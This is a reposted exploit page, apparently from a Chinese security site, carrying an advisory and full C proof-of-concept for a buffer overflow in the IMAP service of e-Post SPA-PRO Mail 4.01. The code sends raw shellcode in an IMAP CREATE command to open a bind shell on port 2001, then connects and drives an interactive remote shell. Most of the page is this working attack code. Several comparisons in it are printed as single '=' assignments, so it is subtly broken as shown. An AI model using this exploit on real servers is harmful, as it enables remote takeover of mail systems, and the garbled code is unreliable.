首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
e-Post SPA-PRO Mail Service Buffer Overflow
来源:www.security.org.sg 作者:vfocus 发布时间:2005-06-03  

e-Post SPA-PRO Mail Service Buffer Overflow

Summary
e-POST SPA-PRO Mail is "a shrink-wrapped version of mail server software for Windows NT4.0/2000/XP. This product can manage up to 512 domains with one server machine and one IP address. It also has several features such as IMAP4 support, reference to ORDB, virus check pattern filter, and SSL and IPv6 support".

The e-Post SPA-PRO Mail is vulnerable to buffer overflow. The following exploit can be used to test your system for the mentioned vulnerability.

Credit:
The original article can be found at: http://www.security.org.sg/vuln/spa-promail4.html
The original article can be found at: http://www.security.org.sg/vuln/spa-promail4-jp.html

Details
Vulnerable Systems:
* e-Post SPA-PRO Mail Server version 4.01

Exploit:
//*************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//*************************************

#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")


unsigned char expBuf[] =
"2 create \""
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
"\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
"\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
"\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
"\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
"\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
"\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
"\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
"\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
"\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
"\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
"\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
"\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
"\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
"\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF"
"\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79"
"\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6"
"\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C"
"\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF"
"\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50"
"\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD"
"\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24"
"\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56"
"\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54"
"\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF"
"\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42"
"\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
"\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A"
"\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E"
"\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52"
"\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56"
"\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A"
"\"\r\n";


void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);

for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}

FD_ZERO(&rset);
FD_SET(sockfd, &rset);

timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;

if(select(0, &rset, NULL, NULL, &tv) = SOCKET_ERROR)
{
printf("select error\n");
break;
}

if(FD_ISSET(sockfd, &rset))
{
int n;

ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOF\n");
return;
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}


#define ADDR_POSITION 534
#define RET_ADDR 0x74F819D6 // CALL EBX in Japanese Win2K SP4

// First short jump backwards. (EB AO)
// You should know what to change here, landing onto INT 3 to let debugger kick in.
#define FIRST_BACKJMP_INST 0x5AA0EBCC


int main(int argc, char* argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sin;
int err;
char inBuffer[10000];
char loginBuf[1000];

if(argc != 4)
{
printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);
return 1;
}

if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
{
printf("\nInvalid IMAP username! Maximum username length is 20.\n");
return 1;
}

if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
{
printf("\nInvalid IMAP password! Maximum password length is 14.\n");
return 1;
}

memset(loginBuf, 0, sizeof(loginBuf));
_snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]);
loginBuf[sizeof(loginBuf)-1] = 0;

int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);

*((DWORD *)&expBuf[retPos]) = RET_ADDR;
*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;


wVersionRequested = MAKEWORD(2,0);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0)
{
printf("\nWSAStartup Error.\n");
return 1;
}

if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
{
printf("\nWinsock Version Error\n");
WSACleanup();
return 1;
}

SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

sin.sin_addr.s_addr = inet_addr(argv[3]);
sin.sin_family = AF_INET;
sin.sin_port = htons(143);

printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));

if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
{
int size;

// read IMAP banner
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size = SOCKET_ERROR)
{
printf("[-] Error receiving IMAP banner!\n");
return 1;
}

printf("[+] IMAP banner received!\n\n");
fwrite(inBuffer, 1, size, stdout);
printf("\n");

if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) = SOCKET_ERROR)
{
printf("[-] Error sending login!\n");
return 1;
}

printf("[+] Login Sent.\n");

size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size = SOCKET_ERROR)
{
printf("[-] Error receiving login reply!\n");
return 1;
}
if(strstr(inBuffer, "OK"))
printf("[+] Login successful!\n");
else
{
printf("[+] Login failed!\n");
return 1;
}

if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) = SOCKET_ERROR)
{
printf("[-] Error sending exploit!\n");
return 1;
}
else
{
printf("[+] Exploit sent!\n");
}

Sleep(2000);

//================= Connect to the target ===============
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock = INVALID_SOCKET)
{
printf("Invalid socket return in socket() call.\n");
WSACleanup();
return -1;
}

sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[3]);

if(connect(sock, (sockaddr *)&sin, sizeof(sin)) = SOCKET_ERROR)
{
printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
closesocket(sock);
WSACleanup();
return -1;
}

printf("[+] Exploit successful!\n\n");
shell(sock);
closesocket(sock);
}
else
{
printf("[-] Cannot connect!\n");
}

closesocket(s);
WSACleanup();

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·myBloggie SQL Injection
·ePSXe Local Stack Overflow
·MyBulletinBoard(MyBB) SQL Inje
·CrobFTP Remote Stack Overflow
·IBM AIX invscout Local Exploit
·FutureSoft TFTP Server 2000 Bu
·phpStat Authentication Bypass
·Invision Power Board SQL Injec
·Ethereal <= 0.10.10 SIP Pro
·Kaspersky AntiVirus 5.x klif.s
·Microsoft Windows COM Structur
·Ipswitch IMAP Server LOGIN Com
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved